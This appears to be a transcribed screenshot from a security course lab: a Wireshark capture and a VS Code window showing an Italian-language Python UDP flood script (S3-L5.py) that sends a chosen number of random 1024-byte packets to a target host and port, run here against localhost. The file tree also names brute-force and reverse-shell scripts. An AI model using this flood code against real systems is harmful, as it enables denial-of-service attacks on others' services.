

Capturing from any

File Edit View Go Capture Analyze Statistics Telephony Wireless Tools Help

Apply a display filter ... <Ctrl-/>

No.	Time	Source	Destination	Protocol	Length	Info
6443	213.682722662	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6444	213.682725352	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6445	213.682729262	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6446	213.682732022	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6447	213.682735942	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6448	213.682738632	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6449	213.682742542	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6450	213.682745242	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6451	213.682749162	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6452	213.682751862	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6453	213.682755782	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6454	213.682758482	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6455	213.682762382	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6456	213.682765082	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6457	213.682768982	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6458	213.682771682	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6459	213.682775602	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6460	213.682778312	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6461	213.682782212	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6462	213.682784932	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6463	213.682788802	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6464	213.682791332	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6465	213.682795252	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6466	213.682797961	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6467	213.682801871	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6468	213.682804521	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6469	213.682808451	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6470	213.682811161	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6471	213.682815061	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6472	213.682817741	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6473	213.682821661	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6474	213.682824501	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6475	213.682828401	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6476	213.682830931	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6477	213.682834881	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6478	213.682837571	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6479	213.682841531	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6480	213.682844231	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6481	213.682848161	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6482	213.682850701	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6483	213.682854661	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6484	213.682857381	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6485	213.682861311	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6486	213.682863861	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6487	213.682867751	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6488	213.682870281	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6489	213.682874211	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6490	213.682876911	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6491	213.682880821	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6492	213.682883571	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6493	213.682887551	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6494	213.682890201	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6495	213.682894111	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6496	213.682896651	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6497	213.682900561	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6498	213.682903191	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6499	213.682907101	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6500	213.682909841	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6501	213.682913801	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6502	213.682916331	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6503	213.682920221	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6504	213.682922911	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6505	213.682926901	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6506	213.682929471	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)
6507	213.682933380	127.0.0.1	127.0.0.1	UDP	1068	44419 → 12345 Len=1024
6508	213.682936090	127.0.0.1	127.0.0.1	ICMP	592	Destination unreachable (Port unreachable)

Frame 115: 66 bytes on wire (528 bits). 66 bytes captured (528) on interface 0

Flags (12 bits) (tcp.flags), 2 bytes

Packets: 6508 · Displayed: 6508 (100.0%)

Profile: Default

S3-L5.py - testC - Visual Studio Code

File Edit Selection View Go Run Terminal Help

EXPLORER

- TESTC
 - .vscode
 - launch.json
 - tasks.json
 - c
 - Python
 - loginPhp
 - Python
 - Test
 - altroReverse.py
 - bruteforce_http.py
 - HTTPStatus.py
 - passwords.txt
 - portScanner.py
 - reverse-test.py
 - S3-L5.py
 - socketListner.py
 - users.txt

S3-L5.py

```
Python > S3-L5.py > ...
4
5
6 ipNumber = input("inserisci l'host che vuoi attaccare: \n")
7 portNumber = int(input("inserisci la porta target: \n"))
8 packetsNumber = int(input("e quanti pacchetti? \n"))
9
10 print(f"Inizio attacco verso: {ipNumber}:{portNumber} con {packetsNumber} pacchetti")
11
12 s = so.socket(so.AF_INET, so.SOCK_DGRAM)
13 pack = rd.randbytes(1024)
14
15 for i in range(packetsNumber):
16     try:
17         s.sendto(pack, (ipNumber, portNumber))
18         if (i+1 == packetsNumber):
19             print(f"{i+1} pacchetti inviati")
20     except Exception as e:
21         print(f"ERRORE NELL'INVIO DEL PACCHETTO {i} PER : {e}")
22
23
24 s.close()
25
```

PROBLEMS OUTPUT DEBUG CONSOLE TERMINAL PORTS

zsh

Python

```
(kali@kali) - [~/Desktop/testC]
$ /bin/python3.12 /home/kali/Desktop/testC/Python/S3-L5.py
inserisci l'host che vuoi attaccare:
127.0.0.1
inserisci la porta target:
12345
e quanti pacchetti?
50000
Inizio attacco verso: 127.0.0.1:12345 con 50000 pacchetti
50000 pacchetti inviati

(kali@kali) - [~/Desktop/testC]
$
```

Ln 25, Col 1 Spaces: 4 UTF-8 LF Python 3.12.2 64-bit